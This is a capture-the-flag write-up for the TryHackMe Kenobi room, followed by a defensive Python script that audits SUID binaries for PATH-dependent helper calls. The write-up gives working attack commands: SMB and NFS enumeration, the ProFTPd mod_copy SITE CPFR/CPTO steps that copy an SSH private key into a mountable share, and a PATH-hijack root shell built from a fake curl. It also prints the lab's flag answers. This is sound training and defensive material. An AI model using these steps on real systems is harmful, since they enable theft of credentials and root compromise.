KenoBi WriteUp “Try Hack Me”

os
3 min read · Jan 14, 2023

https://tryhackme.com/room/kenobi

Q1>
nmap -sT 10.10.103.23 -p-
Open Ports :
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
33813/tcp open unknown
37651/tcp open unknown
40133/tcp open unknown
54859/tcp open unknown

The answer is 7, as the last 4 ports belong to unknown services.

Enumerating for samba shares

Q1>
possible commands :
enum4linux
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.103.23

3 shares found:
Sharename   Type   Comment
---------   ----   -------
print$      Disk   Printer Drivers
anonymous   Disk
IPC$        IPC    IPC Service (kenobi server (Samba, Ubuntu))

Q2>
smbclient //10.10.103.23/Anonymous
apparently no password is required here (anonymous login)

filename = log.txt
download it via the get command, or fetch the whole share with
smbget -R smb://<ip>/anonymous

Q3>
21

Q4>
Port 111 (rpcbind): allows a user on one machine to request services from another computer, as long as both are connected to the same network. As we are on the same network as the target, it is ready to serve us.

to enumerate :
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.103.23

Exported mount: /var

Gain initial access with ProFtpd

Q1>
connect to ProFTPd with netcat:
nc 10.10.103.23 21
the banner gives version = 1.3.5

Q2>
searchsploit ProFTPd 1.3.5
number of exploits: 4

link to exploit-db: ProFTPd 1.3.5 - File Copy - Linux remote Exploit (exploit-db.com)

Q3>
log.txt told us the location of kenobi's private SSH key.
SITE CPFR /home/kenobi/.ssh/id_rsa
copy it into /var, which, as we saw, is the directory shared on the network.
SITE CPTO /var/temp_id-rsa

The nmap scan showed that /var can be mounted.

Create a sub-directory under the mount folder:
mkdir /mnt/kenobiNFS

Mount the directory:
mount 10.10.102.233:/var /mnt/kenobiNFS

# mount machine_ip:/exported_path /local_mount_point
Then copy the file into your home directory.

Q4>
user.txt = d0b0f3f53b6caa532a83915e19224899

Privilege escalation via PATH variable manipulation

Q1>
find / -perm -u=s -type f 2>/dev/null

suspicious file: /usr/bin/menu
# a file like this is not normally located in /usr/bin

Q2>
Run the binary: /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
answer : 3

Q4> Run the strings command:
strings /usr/bin/menu
we see it calls the curl binary by name rather than by absolute path,
so we make a malicious curl binary in the /tmp directory
and store the path to a shell inside it. As menu runs with root privileges, it will launch our root shell.

$ echo /bin/sh > curl
$ chmod 777 curl
$ export PATH=/tmp:$PATH
$ # we prepend /tmp to PATH so that when the binary runs it resolves curl from /tmp first, and since it calls curl it launches the root shell.

root flag = 177b3cd8562289f37382721c28381f02
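The root cause above is a SUID program that shells out to "curl" by bare name, so PATH decides what runs as root. The following audit script, added here and not part of the room or the original post, reimplements the strings check over every SUID binary and flags the ones that embed PATH-dependent command names; the COMMANDS list is an assumed starting set.

```python
"""Flag SUID binaries that call helpers by bare name (PATH-dependent) - added
example for this write-up, not code from the room or the original post. The
Kenobi menu binary calls "curl" without an absolute path, which is the bug."""
import os
import re
import stat
import sys
# Helpers SUID programs often shell out to (assumed list; extend as needed).
COMMANDS = {"curl", "wget", "uname", "ifconfig", "ip", "ps", "netstat", "cat", "ls"}
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # same 4-char threshold as `strings`

def find_relative_commands(data: bytes, commands=COMMANDS) -> dict:
    """Map bare command name -> embedded strings starting with it. "curl -I x" is
    flagged; "/usr/bin/curl -I x" is not, since an absolute path ignores PATH."""
    hits = {}
    for match in PRINTABLE.finditer(data):
        text = match.group().decode("ascii")
        words = text.split()
        if words and words[0] in commands:
            hits.setdefault(words[0], []).append(text)
    return hits

def is_suid(path: str) -> bool:
    # Regular file with the setuid bit set; unreadable/missing paths count as False.
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def audit(root: str = "/") -> dict:
    """Walk `root`; map each SUID binary to the PATH-dependent commands it embeds."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not is_suid(path):
                continue
            try:
                with open(path, "rb") as fh:
                    hits = find_relative_commands(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings

if __name__ == "__main__":  # e.g. python3 suid_path_audit.py /usr/bin
    for path, hits in audit(sys.argv[1] if len(sys.argv) > 1 else "/").items():
        print(f"{path}: {', '.join(sorted(hits))}")
```

Any hit is worth a fix in the binary itself (absolute paths or a reset PATH before system()), since the SUID bit makes the caller's environment part of the attack surface.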
